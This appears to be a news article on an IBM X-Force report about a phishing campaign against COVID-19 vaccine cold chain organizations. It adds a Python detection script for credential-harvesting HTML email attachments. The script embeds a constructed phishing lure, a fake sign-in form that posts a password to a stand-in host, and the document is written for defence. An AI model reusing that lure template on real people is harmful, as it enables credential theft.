IBM Security (the company’s cybersecurity division) has disclosed a global phishing campaign targeting organizations associated with the COVID-19 vaccine cold chain. Its X-Force threat-intelligence team, which set up a dedicated task force at the onset of the pandemic to track cyber threats against vaccine developers and distributors, released a report on Thursday with its analysis and recommendations.
Starting in September and spanning at least six countries and multiple organizations, the operation appears to have specifically targeted the Cold Chain Equipment Optimization Platform (CCEOP), a $400M, five-year project launched in 2015 by Gavi, the Vaccine Alliance, UNICEF, and other partners. CCEOP was initiated to upgrade existing cold chain equipment in 56 countries by 2021, and this year it has been used to support COVID-19 vaccine response efforts. Because vaccines are both light- and heat-sensitive, this equipment is vital to preserving vaccine quality and potency during storage and transport.
The attacks impersonated a business executive from Haier Biomedical, a legitimate CCEOP supplier and purportedly the world’s only complete cold chain provider. Posing as this executive, the attacker sent phishing emails to organizations that support the CCEOP effort, including companies in the energy sector (for example, makers of solar-powered vaccine refrigerators and petrochemical producers of dry ice) and in the IT sector (for example, firms that secure pharmaceutical manufacturing and the biotechnology and electrical components of container transport). The emails posed as requests for quotation to participate in a vaccine program, but carried malicious HTML attachments that, when opened, prompted the recipient to enter their credentials. Because such an attachment renders locally in the recipient’s browser and the message body carries no link, the lure can slip past URL-based mail filtering; the credentials typed into the fake sign-in page are submitted to infrastructure the attacker controls. IBM assesses that the harvested credentials were possibly meant to enable theft of the cold chain technology itself, or more likely to gain unauthorized access to confidential information about COVID-19 vaccine distribution, such as timelines, recipient lists, and shipping routes, for a more harmful objective. IBM has not attributed the campaign, but the precision targeting and sophistication point to a nation-state rather than an ordinary criminal operation.
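To make the detection side of this concrete, here is an added example (not code from IBM’s report or from the article) that scans raw e-mail messages for the pattern described above: an HTML attachment containing a form that collects a password and posts it to an absolute URL. A locally opened HTML file has no origin of its own, so a credential form inside it must name the receiving server outright, and that host is what the scan reports. The sample messages, sender and recipient addresses, file names and hosts below are all constructed for the demo; nothing here is an indicator from the actual campaign.

```python
"""Flag e-mail attachments that carry a credential-harvesting HTML form.

Added example, not code from IBM's report or the article. Uses only the
Python standard library: the `email` package to parse the message and pull
out attachments, `html.parser` to find <form> elements, and `urllib.parse`
to read the form's target host. All sample data is constructed.
"""
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Record each <form>'s action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []          # [{"action": str, "password": bool}, ...]
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)          # attribute names arrive lowercased
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def html_attachments(raw):
    """Yield (filename, html_text) for each HTML attachment of a raw message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            content = part.get_content()
            if isinstance(content, bytes):      # e.g. sent as application/octet-stream
                content = content.decode("utf-8", errors="replace")
            yield name, content


def scan_message(raw, allowed_hosts=()):
    """Return one finding per HTML attachment whose form posts a password off-host.

    allowed_hosts is an allow list of hosts a legitimate attachment may post to;
    anything else that receives a password field is reported.
    """
    findings = []
    for name, html in html_attachments(raw):
        scanner = _FormScanner()
        scanner.feed(html)
        for form in scanner.forms:
            host = urlparse(form["action"]).hostname
            if form["password"] and host and host not in allowed_hosts:
                findings.append({"attachment": name, "posts_to": host})
    return findings


def build_message(subject, body, attachment_name, attachment_html):
    """Construct a raw multipart message with one HTML attachment (demo data)."""
    msg = EmailMessage()
    msg["From"] = "procurement@supplier.invalid"   # constructed sender
    msg["To"] = "sales@coldchain-vendor.invalid"   # constructed recipient
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(attachment_html, subtype="html", filename=attachment_name)
    return msg.as_bytes()


# Constructed lure in the shape described in the article: an RFQ whose
# attachment is a fake sign-in page posting credentials to a chosen host.
PHISHING_LURE = build_message(
    "Request for Quotation - vaccine cold chain program",
    "Please review the attached RFQ and respond with pricing.",
    "RFQ_Vaccine_Program.html",
    "<html><body><h2>Sign in to view the document</h2>"
    '<form method="post" action="https://docs-portal.invalid/submit">'
    '<input name="user" type="text"><input name="pass" type="password">'
    '<input type="submit" value="Open"></form></body></html>',
)

# Constructed benign message: an HTML attachment with no credential form.
BENIGN_QUOTE = build_message(
    "Quotation Q-1042",
    "Quotation attached as requested.",
    "Quotation_Q-1042.html",
    "<html><body><h2>Quotation Q-1042</h2><table><tr><td>Item</td><td>Price</td></tr>"
    "<tr><td>Vaccine refrigerator</td><td>USD 2,400</td></tr></table></body></html>",
)

if __name__ == "__main__":
    for label, raw in (("lure", PHISHING_LURE), ("quote", BENIGN_QUOTE)):
        print(label, scan_message(raw))
```

The check is deliberately narrow: it catches the form-based variant in which the attachment names its collection server in the form’s `action`. A page that gathers the password with JavaScript and sends it via `fetch()` or an XMLHttpRequest, or one that merely links out to a hosted phishing site, would need a separate rule, and hosts on the allow list should be limited to services the organization actually uses.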
While it is not yet known whether the phishing attempts succeeded, governments are already sounding the alarm and alerting organizations involved in developing, manufacturing, and distributing the COVID-19 vaccine to the threat of cyberattacks. Intentional interference with the vaccine cold chain is a chilling prospect, and the companies involved are strongly encouraged to review the recommendations and indicators of compromise set out in IBM’s report, as well as the U.S. Cybersecurity & Infrastructure Security Agency’s (CISA) guidance on avoiding phishing attacks in CISA Insights: Enhance Email & Web Security.